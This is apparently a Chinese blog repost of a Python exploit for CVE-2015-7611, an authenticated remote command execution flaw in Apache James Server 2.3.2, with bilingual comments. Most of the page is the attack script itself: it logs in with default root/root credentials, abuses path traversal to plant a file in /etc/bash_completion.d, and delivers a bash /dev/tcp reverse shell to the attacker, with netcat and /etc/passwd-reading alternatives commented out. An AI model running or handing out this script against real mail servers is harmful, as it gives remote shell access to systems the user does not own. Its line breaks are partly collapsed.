CVE-2015-7611

适用于Apache James Server 2.3.2 默认安装账户密码为root root

靶场 solidstate 也适用，但是不能直接获得shell

Apache James ：Apache James 简称 James, 是 Java Apache Mail Enterprise Server的缩写。James 是100%基于Java的电子邮件服务器。它是一种独立的邮件服务器，并提供了一个完整的电子邮件解决方案，用来收、发电子邮件。

Apache James Server 2.3.2 远程命令执行RCE


# Exploit Title: Apache James Server 2.3.2 - Remote Command Execution (RCE) (Authenticated) (2)
# 漏洞标题 Apache James Server 2.3.2   远程命令执行RCE 
# Date: 27/09/2021# Software Link: http://ftp.ps.pl/pub/apache/james/server/apache-james-2.3.2.zip  软件下载连接
# Version: Apache James Server 2.3.2
# Tested on: Ubuntu
# Info: This exploit works on default installation of Apache James Server 2.3.2   适用于Apache James Server 2.3.2的默认安装
# Info: Example paths that will automatically execute payload on some action: /etc/bash_completion.d , /etc/pm/config.d
#将对某些操作自动执行有效负载的示例路径：/etc/bash_completion.d、/etc/pm/config。d
'''
This Python 3 implementation is based on the original (Python 2) exploit code developed by  The following modifications were made:1 - Made required changes to print and socket commands for Python 3 compatibility.
1 - Changed the default payload to a basic bash reverse shell script and added a netcat option.
2 - Changed the command line syntax to allow user input of remote ip, local ip and listener port to correspond with #2.
3 - Added a payload that can be used for testing remote command execution and connectivity.
4 - Added payload and listener information output based on payload selection and user input.
5 - Added execution output clarifications and additional informational comments throughout the code.
这个Python 3实现基于由开发的原始（Python 2）漏洞利用代码进行了以下修改：1-对打印和套接字命令进行了必要的更改，以兼容Python 3。
1-将默认负载更改为基本的bash反向shell脚本，并添加了netcat选项。
2-更改了命令行语法，允许用户输入远程ip、本地ip和侦听器端口，以与#2相对应。
3-添加了可用于测试远程命令执行和连接的有效载荷。
4-添加了基于有效载荷选择和用户输入的有效载荷和侦听器信息输出。
5-在整个代码中添加了执行输出说明和其他信息注释。
@shinris3n
https://twitter.com/shinris3n
https://shinris3n.github.io/
'''#!/usr/bin/python3import socket
import sys
import time# credentials to James Remote Administration Tool (Default - root/root) James远程管理工具的凭据（默认-root/root）
user = 'root'
pwd = 'root'if len(sys.argv) != 4:sys.stderr.write("[-]Usage: python3 %s <remote ip> <local ip> <local listener port>\n" % sys.argv[0])sys.stderr.write("[-]Example: python3 %s 172.16.1.66 172.16.1.139 443\n" % sys.argv[0])sys.stderr.write("[-]Note: The default payload is a basic bash reverse shell默认负载是一个基本的bash反向shell - check script for details and other options检查脚本以了解详细信息和其他选项.\n")sys.exit(1)remote_ip = sys.argv[1]
local_ip = sys.argv[2]
port = sys.argv[3]# Select payload prior to running script - default is a reverse shell executed upon any user logging in (i.e. via SSH)
#在运行脚本之前选择有效负载-默认情况下，任何用户登录（即通过SSH）时都会执行反向shell
payload = '/bin/bash -i >& /dev/tcp/' + local_ip + '/' + port + ' 0>&1' 
print(payload) #bash -i >& /dev/tcp/10.0.0.1/8080 0>&1   #/bin/bash -i >& /dev/tcp/192.168.2.1:4444 0>&1 '/bin/bash -i >& /dev/tcp/' + local_ip + ':' + port + ' 0>&1' 
# basic bash reverse shell exploit executes after user login基本的bash反向shell漏洞在用户登录后执行
#payload = 'nc -e /bin/sh ' + local_ip + ' ' + port # basic netcat reverse shell
#payload = 'echo $USER && cat /etc/passwd && ping -c 4 ' + local_ip # test remote command execution capabilities and connectivity
#payload = '[ "$(id -u)" == "0" ] && touch /root/proof.txt' # proof of concept exploit on root user login onlyprint ("[+]Payload Selected (see script for more options): ", payload)
if '/bin/bash' in payload:print ("[+]Example netcat listener syntax to use after successful execution成功执行后使用的示例netcat侦听器语法：nc -lvnp", port)def recv(s):s.recv(1024)time.sleep(0.2)try:print ("[+]Connecting to James Remote Administration Tool...连接到James远程管理工具") s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)s.connect((remote_ip,4555)) # Assumes James Remote Administration Tool is running on Port 4555, change if necessary.假设James远程管理工具正在端口4555上运行，必要时进行更改。s.recv(1024)s.send((user + "\n").encode('utf-8'))s.recv(1024)s.send((pwd + "\n").encode('utf-8'))s.recv(1024)print ("[+]Creating user...")s.send("adduser ../../../../../../../../etc/bash_completion.d exploit\n".encode('utf-8'))s.recv(1024)s.send("quit\n".encode('utf-8'))s.close()print ("[+]Connecting to James SMTP server...")s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)s.connect((remote_ip,25)) # Assumes default SMTP port, change if necessary.假设默认SMTP端口，必要时进行更改。s.send("ehlo team@team.pl\r\n".encode('utf-8'))recv(s)print ("[+]Sending payload...")s.send("mail from: <'@team.pl>\r\n".encode('utf-8'))recv(s)# also try s.send("rcpt to: <../../../../../../../../etc/bash_completion.d@hostname>\r\n".encode('utf-8')) if the recipient cannot be founds.send("rcpt to: <../../../../../../../../etc/bash_completion.d>\r\n".encode('utf-8'))recv(s)s.send("data\r\n".encode('utf-8'))recv(s)s.send("From: team@team.pl\r\n".encode('utf-8'))s.send("\r\n".encode('utf-8'))s.send("'\n".encode('utf-8'))s.send((payload + "\n").encode('utf-8'))s.send("\r\n.\r\n".encode('utf-8'))recv(s)s.send("quit\r\n".encode('utf-8'))recv(s)s.close()print ("[+]Done! Payload will be executed once somebody logs in (i.e. via SSH).有人登录后将执行有效载荷")if '/bin/bash' in payload:print ("[+]Don't forget to start a listener on port别忘了在端口上启动侦听器", port, "before logging in!登录前")
except Exception as e:print ("Connection failed.连接失败。")print(e)

CVE-2015-7611

相关文章

50.pow(x, n) python

麒麟系统修改配置镜像源地址并安装openGL

微服务设计原则——功能设计

LabVIEW水泵性能测试系统

【Spring】Spring的模块架构与生态圈—Spring MVC与Spring WebFlux

一网多平面

【国产NI替代】基于FPGA的4通道电压 250M采样终端边缘计算采集板卡，主控支持龙芯/飞腾

数据库安全-redisCouchdb